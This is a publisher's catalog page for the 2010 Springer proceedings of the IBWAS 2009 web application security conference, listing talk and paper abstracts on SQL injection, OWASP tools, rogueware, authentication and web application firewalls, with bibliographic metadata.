Skip to main content
Fachgebiete
Automobil + Motoren Bauwesen + Immobilien Business IT + Informatik Elektrotechnik + Elektronik Energie + Nachhaltigkeit Finance + Banking Management + Führung Marketing + Vertrieb Maschinenbau + Werkstoffe Versicherung + Risiko
DE
EN
Bücher
Zeitschriften
Themenseiten
Organisationspsychologie Projektmanagement Marketing Smart Manufacturing
Weitere Formate
Podcasts Webinare Technik Webinare Wirtschaft Kongresse Veranstaltungskalender Awards
Jetzt Einzelzugang starten
Zugang für Unternehmen
Referenzkunden
SLX-Digitalkonferenz: Zukunftswerkstatt 2024

Mehr Umsatz mit Top-Kontakten

Am 7. Mai erfahren Sie, wie Vertriebsteams Leadgenerierung, Leadnurturing und Leadstrategien effizient steuern können.
Erweiterte Suche
Anmelden
nach oben

2010 | Buch

The OWASP Logging Project Kapitel lesen Erstes Kapitel lesen

Web Application Security

Iberic Web Application Security Conference, IBWAS 2009, Madrid, Spain, December 10-11, 2009. Revised Selected Papers

herausgegeben von: Carlos Serrão, Vicente Aguilera Díaz, Fabio Cerullo

Verlag: Springer Berlin Heidelberg

Buchreihe : Communications in Computer and Information Science

Enthalten in: Springer Professional "Wirtschaft+Technik" , Springer Professional "Technik" , Springer Professional "Wirtschaft"

Einloggen, um Zugang zu erhalten
insite
SUCHEN

Über dieses Buch

IBWAS 2009, the Iberic Conference on Web Applications Security, was the first international conference organized by both the OWASP Portuguese and Spanish ch- ters in order to join the international Web application security academic and industry communities to present and discuss the major aspects of Web applications security. There is currently a change in the information systems development paradigm. The emergence of Web 2. 0 technologies led to the extensive deployment and use of W- based applications and Web services as a way to develop new and flexible information systems. Such systems are easy to develop, deploy and maintain and they demonstrate impressive features for users, resulting in their current wide use. The “social” features of these technologies create the necessary “massification” effects that make millions of users share their own personal information and content over large web-based int- active platforms. Corporations, businesses and governments all over the world are also developing and deploying more and more applications to interact with their bu- nesses, customers, suppliers and citizens to enable stronger and tighter relations with all of them. Moreover, legacy non-Web systems are being ported to this new intrin- cally connected environment. IBWAS 2009 brought together application security experts, researchers, educators and practitioners from industry, academia and international communities such as OWASP, in order to discuss open problems and new solutions in application security. In the context of this track, academic researchers were able to combine interesting results with the experience of practitioners and software engineers.

Inhaltsverzeichnis

Frontmatter

Abstracts

The OWASP Logging Project
Abstract
The presentation explained current shortcomings of Security Information Management systems. A new solution and a working prototype were presented.
In the current Security Information Management Systems it is difficult to obtain relevant views of consolidated data (for instance alarms concerning different clients and different Data Centres on different periods of time), the difficult to calculate essential indicators for management (such as risk indicators such as Annual Lost Expectancy for Assets and the Cost effectiveness of proposed safeguards), difficult to compare with historical data and also some severe performance issues.
Marc Chisinevski
SQL Injection - How Far Does the Rabbit Hole Go?
Abstract
SQL Injection has been around for over 10 years, and yet it is still to this day not truly understood by many security professionals and developers. With the recent mass attacks against sites across the world, and well publicised data breaches with SQL Injection as a component, it has again come to the fore of vulnerabilities under the spotlight, however many consider it to only be a data access issue, or parameterized queries to be a panacea. This talk explores the deeper, darker areas of SQL Injection, hybrid attacks, SQL Injection worms, and exploiting database functionality. Explore what kinds of things we can expect in future.
Justin Clarke
OWASP O2 Platform - Open Platform for Automating Application Security Knowledge and Workflows
Abstract
In this talk Dinis Cruz will show the OWASP O2 Platform, which is an open source toolkit specifically, designed for developers and security consultants to be able to perform quick, effective and thorough ’source-code-driven’ application security reviews. The OWASP O2 Platform (http://www.owasp.org/index.php/OWASP_O2_Platform) consumes results from the scanning engines from Ounce Labs, Microsoft’s CAT.NET tool, FindBugs, CodeCrawler and AppScan DE, and also provides limited support for Fortify and OWASP WebScarab dumps. In the past, there has been a very healthy skepticism on the usability of Source Code analysis engines to find commonly found vulnerablities in real world applications. This presentation will show that with some creative and powerful tools, it IS possible to use O2 to discover those issues. This presentation will also show O2’s advanced support for Struts and Spring MVC.
Dinis Cruz
The Business of Rogueware
Abstract
The growth and complexity of the underground cybercrime economy has grown significantly over the past couple of years due to a variety of factors including the rise of social media tools, the global economic slowdown, and an increase in the total number of Internet users. For the past 3 years, PandaLabs has monitored the ever-evolving cybercrime economy to discover its tactics, tools, participants, motivations and victims to understand the full extent of criminal activities and ultimately bring an end to the offenses. In October of 2008, PandaLabs published findings from a comprehensive study on the rogueware economy, which concluded that the cybercriminals behind fake antivirus software applications were generating upwards of $15 million per month. In July of 2009, it released a follow-on study that proved monthly earnings had more than doubled to approximately $34 million through rougeware attacks distributed via Facebook, MySpace, Twitter, Digg and targeted Blackhat SEO. This session will reveal the latest results from PandaLabs’ ongoing study of the cybercrime economy by illustrating the latest malware strategies used by criminals, examining the changes in their attack strategies over time. The goal of this presentation is to raise the awareness of this growing underground economy.
Luis Corrons
Microsoft Infosec Team: Security Tools Roadmap
Abstract
The Microsoft IT’s Information Security (InfoSec) group is responsible for information security risk management at Microsoft. We concentrate on the data protection of Microsoft assets, business and enterprise. Our mission is to enable secure and reliable business for Microsoft and its customers. We are an experienced group of IT professionals including architects, developers, program managers and managers.
This talk will present different technologies developed by Infosec to protect Microsoft and released for free, such as CAT.NET, SPIDER, SDR, TAM and SRE and how they fit into SDL (Security Development Lifecycle).
Simon Roses
Empirical Software Security Assurance
Abstract
By now everyone knows that security must be built in to software; it cannot be bolted on. For more than a decade, scientists, visionaries, and pundits have put forth a multitude of techniques and methodologies for building secure software, but there has been little to recommend one approach over another or to define the boundary between ideas that merely look good on paper and ideas that actually get results. The alchemists and wizards have put on a good show, but it’s time to look at the real empirical evidence.
This talk examines software security assurance as it is practiced today. We will discuss popular methodologies and then, based on in-depth interviews with leading enterprises such as Adobe, EMC, Google, Microsoft, QUALCOMM, Wells Fargo, and Depository Trust Clearing Corporation (DTCC), we present a set of benchmarks for developing and growing an enterprise-wide software security initiative, including but not limited to integration into the software development lifecycle (SDLC). While all initiatives are unique, we find that the leaders share a tremendous amount of common ground and wrestle with many of the same problems. Their lessons can be applied in order to build a new effort from scratch or to expand the reach of existing security capabilities.
Dave Harper
Assessing and Exploiting Web Applications with the Open-Source Samurai Web Testing Framework
Abstract
The Samurai Web Testing Framework (WTF) is an open-source LiveCD based on Ubuntu and focused on web application security testing. It includes an extensive collection of pre-installed and pre-configured top penetration testing and security analysis tools, becoming the perfect environment for assessing and exploiting web applications. The tools categorization guides the analyst through the web-app penetration testing methodology, from reconnaissance, to mapping, discovery and exploitation. The project web page is http://sf.net/projects/samurai/.
Raul Siles
Authentication: Choosing a Method That Fits
Abstract
Through the last five years, we, in the security field, have been witnessing an increase in the number of attacks to (web) application user’s credentials, and the refinement and sophistication these attacks have been gaining. There are currently several methods and mechanisms to increase the strength of the authentication process for web applications. To improve the user authentication process, but also to improve the transaction authentication. As an example, one can think of adding one-time password tokens, or digital certificates, EMV cards, or even SMS one-time codes. However, none of these methods comes for free, nor do they provide perfect security. Also, one must consider usability penalties, mobility constraints, and, of course, the direct costs of the gadgets. Moreover, there’s evidence that not all kinds of attacks can be stopped by even the most sophisticated of these methods. So, where do we stand? What should we choose? What kind of gadgets should we use for our business critical app, how much will they increase the costs and reduce the risk, and, last but not least, what kind of attacks we’ll be unable to stop anyway? This presentation will focus on ways to figure out how to evaluate the pros and cons of adding these improvements, given the current threats.
Miguel Almeida
Cloud Computing: Benefits, Risks and Recommendations for Information Security
Abstract
The presentation “Cloud Computing: Benefits, risks and recommendations for information security” will cover some the most relevant information security implications of cloud computing from the technical, policy and legal perspective.
Information security benefit and top risks will be outlined and most importantly, concrete recommendations for how to address the risks and maximise the benefits for users will be given.
Daniele Catteddu
OWASP TOP 10 2009
Abstract
The primary aim of the OWASP Top 10 is to educate developers, designers, architects and organizations about the consequences of the most important web application security weaknesses. The Top 10 provides basic methods to protect against these high risk problem areas –and provides guidance on where to go from here.
The Top 10 project is referenced by many standards, books, tools, and organizations, including MITRE, PCI DSS, DISA, FTC, and many more. The OWASP Top 10 was initially released in 2003 and minor updates were made in 2004, 2007, and this 2010 release. We encourage you to use the Top 10 to get your organization started with application security.
Fabio E. Cerullo
Deploying Secure Web Applications with OWASP Resources
Abstract
Secure applications do not just happen – they are the result of an organization deciding that they will produce secure applications. OWASP’s does not wish to force a particular approach or require an organization to pick up compliance with laws that do not affect them as every organization is different.
Fabio E. Cerullo
Thread Risk Modelling
Abstract
How secure must an application be? To take the appropriate measures we have to identify the risks first and think about the measures later. Threat risk modelling is an essential process for secure web application development. It allows organizations to determine the correct controls and to produce effective countermeasures within budget. This presentation is about how to do a Tread Risk Modelling. What is needed to start and where to go from there!
Martin Knobloch
Protection of Applications at the Enterprise in the Real World: From Audits to Controls
Abstract
Securing application development in the enterprise world, where applications range from small in-house applications developed by a small department to large applications developed through an outsourcing company in a project spanning several years. In addition those applications that initially where not considered critical, suddenly become part of a critical process or those that were going to be used in a small and limited internal environment suddenly get promoted and published as a new service on the Internet.
To get a better feeling of what works and what does not work in the harsh world outside, this talk will present examples of do’s and don’ts coming from real world projects attempting to protect security applications in different stages: from the introduction of technical measures to prevent abuse of Internet-facing applications to source-code driven application security testing.
Javier Fernández-Sanguino

Papers

A Semantic Web Approach to Share Alerts among Security Information Management Systems
Abstract
This paper presents a semantic web-based architecture to share alerts among Security Information Management Systems (SIMS). Such architecture is useful if two or more SIMS from different domains need to know information about alerts happening in the other domains, which is useful for an early response to network incidents. For this, an ontology has been defined to describe the knowledge base of each SIMS that contains the security alerts. These knowledge bases can be queried from other SIMS, using standard semantic web protocols. Two modules have been implemented: one to insert the new security alerts in the knowledge base, and another one to query such knowledge bases. The performance of both modules has been evaluated, providing some results.
Jorge E. López de Vergara, Víctor A. Villagrá, Pilar Holgado, Elena de Frutos, Iván Sanz
WASAT- A New Web Authorization Security Analysis Tool
Abstract
WASAT (Web Authentication Security Analysis Tool) is an intuitive and complete application designed for the assessment of the security of different web related authentication schemes, namely Basic Authentication and Forms-Based Authentication. WASAT is able to mount dictionary and brute force attacks of variable complexity against the target web site. Password files incorporate a syntax to generate different password search spaces. An important feature of this tool is that low-signature attacks can be performed in order to avoid detection by anti-brute-force mechanisms. This tool is platform-independent and multithreading too, allowing the user to take control of the program speed. WASAT provides some features not included in many of the existing similar applications and hardly any of their drawbacks, making this tool an excellent one for security analysis.
Carmen Torrano-Gimenez, Alejandro Perez-Villegas, Gonzalo Alvarez
Connection String Parameter Pollution Attacks
Abstract
In 2007 the classification of the ten most critical vulnerabilities for the security of a system establishes that code injection attacks are the second type of attack behind XSS attacks. Currently the code injection attacks are placed first in this ranking. In fact Most critical attacks are those that combine XSS techniques to access systems and code injection techniques to access the information. The potential damage associated with this type of threats, the total absence of background and the fact that the solution to mitigate this vulnerability must be implemented by systems administrators and the database vendors justify an in-depth analysis to estimate all the possible ways of implementation of this attack technique.
Chema Alonso, Manuel Fernandez, Alejandro Martín, Antonio Guzmán
Web Applications Security Assessment in the Portuguese World Wide Web Panorama
Abstract
Following the EU Information and Communication Technologies agenda, the Portuguese Government has started the creation of many applications, enabling electronic interaction between individuals, companies and the public administration – the e-Government. Due to the Internet open nature and the sensitivity of the data that those applications have to handle, it is important to ensure and assess their security. Financial institutions, such as banks, that nowadays use the WWW as a communication channel with their customers, face the same challenges.
The main objective of this paper is to introduce a work that will be performed to assess the security of the financial and public administration sectors web applications. In this paper the authors provide a description of the rationale behind this work that involves the selection of a set of key financial and public administration web applications, the definition and application of a security assessment methodology, and the evaluation the assessment results.
Nuno Teodoro, Carlos Serrão
Building Web Application Firewalls in High Availability Environments
Abstract
Every day increases the number of Web applications and Web services due to migration that is occurring in this type of environments. In these scenarios, it is very common to find all types of vulnerabilities affecting web applications and traditional methods of protection at the network and transport level, not enough to mitigate them.  What is more, there are also situations where the availability of information systems is vital for proper functioning. To protect our systems from these threats, we need a component acting on the layer 7 of the OSI model, which includes the HTTP protocol that allows us to analyze traffic and HTTPS that is easily scalable. To solve these problems, the paper presents the design and implementation of an Open Source application firewall, ModSecurity, emphasizing the use of the positive security model, and the deployment of high availability environments.
Juan Galiana Lara, Àngel Puigventós Gracia
Backmatter
Metadaten
Titel
Web Application Security
herausgegeben von
Carlos Serrão
Vicente Aguilera Díaz
Fabio Cerullo
Copyright-Jahr
2010
Verlag
Springer Berlin Heidelberg
Electronic ISBN
978-3-642-16120-9
Print ISBN
978-3-642-16119-3
DOI
https://doi.org/10.1007/978-3-642-16120-9